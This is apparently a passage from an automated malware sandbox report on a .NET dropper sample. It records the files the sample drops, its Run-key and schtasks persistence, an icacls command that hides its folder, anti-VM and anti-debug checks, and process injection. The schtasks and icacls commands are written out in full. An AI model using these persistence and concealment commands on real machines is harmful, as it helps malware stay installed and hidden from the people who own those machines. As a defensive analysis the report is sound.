Source:	Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: comdlg32.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000002F.00000003.431937820.0000000005550000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: nsi.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb<8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc.pdbN8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdbp8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: iertutil.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 0000002F.00000003.431937820.0000000005550000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000002F.00000003.431937820.0000000005550000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000002F.00000003.431937820.0000000005550000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbk source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: rasadhlp.pdb(8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdbf8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: rasadhlp.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdbk source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb~8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: wa71myDkbQ.exe, u0001/u0005.cs	.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: wa71myDkbQ.exe.0.dr, u0001/u0005.cs	.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.wa71myDkbQ.exe.330000.0.unpack, u0001/u0005.cs	.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.wa71myDkbQ.exe.330000.0.unpack, u0001/u0005.cs	.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.wa71myDkbQ.exe.500000.1.unpack, u0001/u0005.cs	.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.wa71myDkbQ.exe.500000.9.unpack, u0001/u0005.cs	.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.wa71myDkbQ.exe.500000.12.unpack, u0001/u0005.cs	.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.wa71myDkbQ.exe.500000.0.unpack, u0001/u0005.cs	.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.wa71myDkbQ.exe.500000.3.unpack, u0001/u0005.cs	.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.wa71myDkbQ.exe.500000.6.unpack, u0001/u0005.cs	.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe

Code function: 14_2_00E84798 SetThreadDesktop,send,send,send,recv,recv,send,send,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetDesktopWindow,GetWindowRect,send,send,send,send,send,send,recv,recv,recv,TerminateThread,

14_2_00E84798

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0040B256 push ecx; ret	13_2_0040B269
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0042B63D push esi; ret	13_2_0042B646
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0040AEBF push ecx; ret	13_2_0040AED2
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_00424FAC push eax; ret	13_2_00424FCA
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00EA4B2D push ecx; ret	14_2_00EA4B40
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E8B6C6 push ecx; ret	14_2_00E8B6D9
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B64B2D push ecx; ret	25_2_00B64B40
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B4B6C6 push ecx; ret	25_2_00B4B6D9
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B64B2D push ecx; ret	33_2_00B64B40
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B4B6C6 push ecx; ret	33_2_00B4B6D9
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B64B2D push ecx; ret	36_2_00B64B40
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B4B6C6 push ecx; ret	36_2_00B4B6D9

Source: initial sample	Static PE information: section name: .text entropy: 7.97827375309
Source: initial sample	Static PE information: section name: .text entropy: 7.97827375309

Source: C:\Users\user\Desktop\wa71myDkbQ.exe	File created: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	File created: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	File created: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe

File created: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe

Jump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious names

Show sources

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2}

Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} /tr C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2}			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2}			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Creates files in alternative data streams (ADS)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe

File created: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe

Code function: 13_2_0040A0DA GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

13_2_0040A0DA

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny '*S-1-1-0:(R,REA,RA,RD)' '*S-1-5-7:(R,REA,RA,RD)'

Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Section loaded: OutputDebugStringW count: 1962
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Section loaded: OutputDebugStringW count: 1962

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\wa71myDkbQ.exe TID: 2680

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0041E3B5 FindFirstFileExA,	13_2_0041E3B5
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E99BE4 FindFirstFileExW,	14_2_00E99BE4
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B59BE4 FindFirstFileExW,	25_2_00B59BE4
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B59BE4 FindFirstFileExW,	33_2_00B59BE4
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B59BE4 FindFirstFileExW,	36_2_00B59BE4

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe

Code function: 13_2_00402B64 new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo,

13_2_00402B64

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: wa71myDkbQ.exe, 0000000D.00000002.367553941.00000000038A0000.00000002.00000001.sdmp, WerFault.exe, 0000002F.00000002.456238833.00000000051C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 0000002F.00000003.452903812.000000000517B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 0000000C.00000002.353332122.0000000003043000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y'
Source: wa71myDkbQ.exe, 0000000D.00000002.367553941.00000000038A0000.00000002.00000001.sdmp, WerFault.exe, 0000002F.00000002.456238833.00000000051C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wa71myDkbQ.exe, 0000000D.00000002.367553941.00000000038A0000.00000002.00000001.sdmp, WerFault.exe, 0000002F.00000002.456238833.00000000051C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wa71myDkbQ.exe, 0000000D.00000002.367553941.00000000038A0000.00000002.00000001.sdmp, WerFault.exe, 0000002F.00000002.456238833.00000000051C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Process queried: DebugPort
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Process queried: DebugPort
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Process queried: DebugPort
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Process queried: DebugPort
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Code function: 0_2_00C14DF9 LdrInitializeThunk,

0_2_00C14DF9

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe

Code function: 13_2_0040B01C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

13_2_0040B01C

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe

14_2_00E84798

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_00415B9F mov eax, dword ptr fs:[00000030h]	13_2_00415B9F
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E82390 mov eax, dword ptr fs:[00000030h]	14_2_00E82390
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E99643 mov eax, dword ptr fs:[00000030h]	14_2_00E99643
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E92E1C mov eax, dword ptr fs:[00000030h]	14_2_00E92E1C
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B42390 mov eax, dword ptr fs:[00000030h]	25_2_00B42390
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B52E1C mov eax, dword ptr fs:[00000030h]	25_2_00B52E1C
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B59643 mov eax, dword ptr fs:[00000030h]	25_2_00B59643
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B42390 mov eax, dword ptr fs:[00000030h]	33_2_00B42390
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B52E1C mov eax, dword ptr fs:[00000030h]	33_2_00B52E1C
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B59643 mov eax, dword ptr fs:[00000030h]	33_2_00B59643
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B42390 mov eax, dword ptr fs:[00000030h]	36_2_00B42390
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B52E1C mov eax, dword ptr fs:[00000030h]	36_2_00B52E1C
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B59643 mov eax, dword ptr fs:[00000030h]	36_2_00B59643

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe

Code function: 13_2_0041C531 GetProcessHeap,

13_2_0041C531

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0040B16A SetUnhandledExceptionFilter,	13_2_0040B16A
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0040B01C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_0040B01C
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0040B571 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_0040B571
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0041353E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_0041353E
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E8B46C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00E8B46C
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E8AE59 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00E8AE59
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E9273E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00E9273E
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B4B46C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_00B4B46C
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B4AE59 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_00B4AE59
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B5273E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_00B5273E
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B4B46C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_00B4B46C
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B4AE59 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_00B4AE59
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B5273E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_00B5273E
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B4B46C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_00B4B46C
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B4AE59 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	36_2_00B4AE59
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B5273E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_00B5273E

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe

